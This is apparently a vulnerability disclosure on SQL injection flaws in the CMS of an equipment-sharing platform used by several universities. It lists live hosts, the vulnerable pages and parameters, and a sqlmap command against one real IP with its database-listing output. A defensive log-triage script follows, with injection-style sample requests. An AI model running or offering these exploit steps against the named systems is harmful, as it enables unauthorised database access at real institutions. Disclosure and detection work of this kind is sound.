Multiple SQL injections running with SA privileges in the CMS of an equipment sharing platform (package #1)
The affected product is the "large instrument and equipment sharing platform system" developed by the vendor.
About: http://www.wanxinsoft.com/product1_1.asp
Some cases:
http://sys.zafu.edu.cn:81/
http://210.27.176.162/
http://sys.zafu.edu.cn/dy/
http://202.114.168.176/
http://59.69.101.10/
The two vulnerable files are:
/Model/TwoGradePage/newsdetail.aspx
/Model/TwoGradePage/NewsEquipment.aspx
Vulnerability exploitation demonstration:
http://202.114.168.176/model/TwoGradePage/newsdetail.aspx?Id=133&columnId=99
http://202.114.168.176/model/TwoGradePage/NewsEquipment.aspx?OpenID=82&id=11316
sqlmap.py -u "http://202.114.168.176/model/TwoGradePage/newsdetail.aspx?Id=133&columnId=99" --dbs
available databases [6]:
[*] Master
[*] Model
[*] Msdb
[*] Northwind
[*] Pubs
[*] Tempdb
Solution:
Strengthen input validation.
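
A log-triage check for the two affected pages, added here as an example and not part of the original report: it flags requests whose Id, columnId or OpenID value is not a plain integer. It assumes IIS W3C extended logs and that these parameters are meant to be integers (the demonstration URLs only show numeric values); the function names and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qsl

# The two affected pages and the query parameters seen in the report's URLs.
AFFECTED = ("/model/twogradepage/newsdetail.aspx",
            "/model/twogradepage/newsequipment.aspx")
NUMERIC_PARAMS = {"id", "columnid", "openid"}   # assumed to be integer-only
INT_RE = re.compile(r"\d{1,10}")

def suspicious_params(path, query):
    """Return (name, decoded value) pairs that are not plain integers."""
    if path.lower() not in AFFECTED:            # IIS paths are case-insensitive
        return []
    bad = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() in NUMERIC_PARAMS and not INT_RE.fullmatch(value):
            bad.append((name, value))
    return bad

def scan_w3c(lines):
    """Scan W3C extended log lines; field positions come from the #Fields header."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip() or not fields:
            continue
        rec = dict(zip(fields, line.split()))
        bad = suspicious_params(rec.get("cs-uri-stem", ""),
                                rec.get("cs-uri-query", ""))
        if bad:
            hits.append((rec.get("c-ip"), rec.get("cs-uri-stem"), bad))
    return hits

# Constructed sample log (documentation IP ranges, not real traffic).
SAMPLE = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2015-01-01 10:00:00 192.0.2.10 GET /model/TwoGradePage/newsdetail.aspx Id=133&columnId=99 200
2015-01-01 10:00:05 198.51.100.7 GET /model/TwoGradePage/newsdetail.aspx Id=133%20AND%201=1&columnId=99 200
2015-01-01 10:00:09 198.51.100.7 GET /Model/TwoGradePage/NewsEquipment.aspx OpenID=82&id=11316' 500
2015-01-01 10:00:12 192.0.2.10 GET /index.aspx id=abc 200
""".splitlines()

if __name__ == "__main__":
    for ip, stem, bad in scan_w3c(SAMPLE):
        print(ip, stem, bad)
```

The same integer-only rule is what the server-side validation should enforce before the values reach any SQL statement.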